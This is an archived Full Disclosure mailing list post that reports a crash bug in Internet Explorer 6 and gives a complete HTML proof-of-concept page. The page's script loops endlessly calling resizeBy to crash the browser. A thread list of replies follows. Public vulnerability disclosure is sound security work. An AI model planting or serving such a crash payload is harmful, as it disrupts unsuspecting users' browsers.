Full Disclosure mailing list archives
Internet Explorer Ver 6.0.2800.1106 vulnerability
From: "r k" <kgp.143 () gmail com>
Date: Fri, 26 May 2006 18:19:39 +0530
Hi All,
IE Ver 6.0.2800.1106 crashs when we try to resizeby() in the html page.
the following is the code
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<html>
<head>
<title>Internet Explorer Ver 6.0.2800.1106</title>
</head>
<body>
<script>
var wwidth = (window.innerWidth)?window.innerWidth: ((document.all
)?document.body.offsetWidth:null);
while (wwidth)
{
self.resizeBy(-999999, -1);
}
</script>
</body>
</html>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
tested on windows 2000,windows XP
thank you
antar
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Internet Explorer Ver 6.0.2800.1106 vulnerability r k (May 26)
- Re: Internet Explorer Ver 6.0.2800.1106 vulnerability Tonu Samuel (May 26)
- Re: Internet Explorer Ver 6.0.2800.1106 vulnerability ad () heapoverflow com (May 26)
- Re: Internet Explorer Ver 6.0.2800.1106 vulnerability yuanfan bai (May 26)
- Re: Internet Explorer Ver 6.0.2800.1106 vulnerability str0ke (May 26)
- Re: Internet Explorer Ver 6.0.2800.1106 vulnerability Alexander Sotirov (May 26)
- Re: Internet Explorer Ver 6.0.2800.1106 vulnerability Tonu Samuel (May 26)
